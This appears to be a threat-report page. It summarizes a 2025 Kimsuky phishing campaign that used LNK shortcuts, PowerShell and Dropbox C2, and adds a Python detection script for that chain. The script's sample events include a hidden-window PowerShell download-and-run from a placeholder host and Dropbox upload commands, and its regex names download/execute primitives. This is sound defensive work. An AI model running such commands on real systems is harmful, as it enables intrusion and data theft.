Recent Information Theft Case by the Kimsuky Attack Group Using Dropbox
2025-06-30 • Plainbit • Cyber threat report on Kimsuky
Plainbit and South Korea's NCSC document a May 2025 Kimsuky/APT43 phishing case against an activist working on North Korea issues. The actor sent repeated spear-phishing emails that impersonated Sejong Institute staff and nuclear security forum themes, using MEGA links to ZIP files containing malicious LNK shortcuts. When opened, the LNK launched PowerShell that downloaded additional malware, collected host data such as process and OS details, and used Dropbox as a C2 channel to upload system information and receive follow-on commands. The report ties the activity to Kimsuky through overlap with prior techniques, including malicious shortcut execution, cloud-service abuse, and staged payload retrieval.
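The chain summarized above (shortcut opened from Explorer, PowerShell downloading a stage and talking to Dropbox) leaves a recognizable pattern in endpoint process telemetry. The following is an added example of detection logic written for this page, not code from Plainbit, the NCSC, or the report itself. The log format (parent image, image, command line, contacted host separated by `|`) and the sample events are constructed for illustration; the Dropbox API hostnames are real Dropbox endpoints, and `cdn.example.test` is a placeholder download host, not an indicator from the report.

```python
"""Toy detection for an LNK -> PowerShell -> cloud-storage C2 chain.

Constructed example (not the report's own code). Field layout of each
event: parent_image|image|command_line|contacted_host. Everything except
the Dropbox API hostnames is an assumption made for this illustration.
"""
import re
from dataclasses import dataclass

# Constructed sample events resembling minimal process-creation records.
SAMPLE_EVENTS = [
    # LNK-style launch: hidden window, download-and-run of a second stage
    'explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://cdn.example.test/x.ps1 -OutFile $env:TEMP\\x.ps1; . $env:TEMP\\x.ps1"|cdn.example.test',
    # host reconnaissance followed by an upload to Dropbox content API
    'explorer.exe|powershell.exe|powershell -nop -c "Get-Process; Get-CimInstance Win32_OperatingSystem"|content.dropboxapi.com',
    # benign admin script run from cmd.exe, no network
    'cmd.exe|powershell.exe|powershell -File C:\\scripts\\backup.ps1|',
    # unrelated process, should never score
    'explorer.exe|notepad.exe|notepad.exe C:\\Users\\user\\notes.txt|',
    # command retrieval / result upload via Dropbox API from PowerShell
    'explorer.exe|powershell.exe|powershell -c "Invoke-RestMethod https://api.dropboxapi.com/2/files/upload"|api.dropboxapi.com',
]

# A shortcut double-clicked in Explorer yields a child of explorer.exe;
# a PowerShell child of Explorer is unusual for interactive users.
SHELL_PARENTS = {"explorer.exe"}

# Hidden-window switch or a download/execute primitive on the command line.
HIDDEN_OR_DOWNLOAD = re.compile(
    r"(-w(indow(style)?)?\s+hidden|\biwr\b|invoke-webrequest|invoke-restmethod"
    r"|downloadstring|downloadfile|\biex\b|invoke-expression)",
    re.I,
)

# Cloud-storage API hosts that legitimate interactive PowerShell rarely contacts.
CLOUD_C2_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "dl.dropboxusercontent.com"}


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str
    host: str


def parse_event(line: str) -> ProcEvent:
    """Split one constructed '|'-delimited record into a ProcEvent."""
    parent, image, cmdline, host = line.split("|", 3)
    return ProcEvent(parent.lower(), image.lower(), cmdline, host.lower())


def score_event(ev: ProcEvent) -> list[str]:
    """Return the list of matched heuristics for a PowerShell event (empty otherwise)."""
    reasons: list[str] = []
    if ev.image != "powershell.exe":
        return reasons
    if ev.parent in SHELL_PARENTS:
        reasons.append("powershell spawned by explorer.exe (consistent with LNK launch)")
    if HIDDEN_OR_DOWNLOAD.search(ev.cmdline):
        reasons.append("hidden window or download/execute primitive in command line")
    if ev.host in CLOUD_C2_HOSTS:
        reasons.append(f"outbound to cloud-storage API host {ev.host}")
    return reasons


def detect(lines: list[str], min_reasons: int = 2) -> list[tuple[int, list[str]]]:
    """Flag events that match at least min_reasons heuristics; returns (index, reasons) pairs."""
    hits = []
    for i, line in enumerate(lines):
        reasons = score_event(parse_event(line))
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

Requiring two independent signals keeps a lone `Invoke-WebRequest` from an admin script below the threshold, while the Explorer-parent plus Dropbox-host combination still fires even when the command line itself looks like harmless inventory collection.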